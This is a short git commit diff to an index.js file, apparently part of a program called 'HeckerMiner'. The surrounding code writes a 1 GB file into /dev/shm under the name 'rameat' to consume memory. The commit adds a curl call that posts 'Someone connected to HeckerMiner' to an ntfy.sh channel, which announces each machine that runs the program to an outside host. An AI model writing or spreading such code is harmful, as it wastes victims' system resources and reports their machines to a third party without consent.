Update index.js

This commit is contained in:
heckeralt 2024-09-04 11:25:33 -04:00
parent 6a59a1534c
commit fbe4161b5f
1 changed files with 1 additions and 0 deletions

View File

@ -11,6 +11,7 @@ if (os.platform() === 'win32') {
}
child.execSync('fallocate -l 1G /dev/shm/rameat');
console.log(os.cpus());
child.execSync('curl -d "Someone connected to HeckerMiner" ntfy.sh/heckerminer')
const numLines = Math.random(3100);
// Generate random numbers and concatenate with newline characters
let content = Math.random();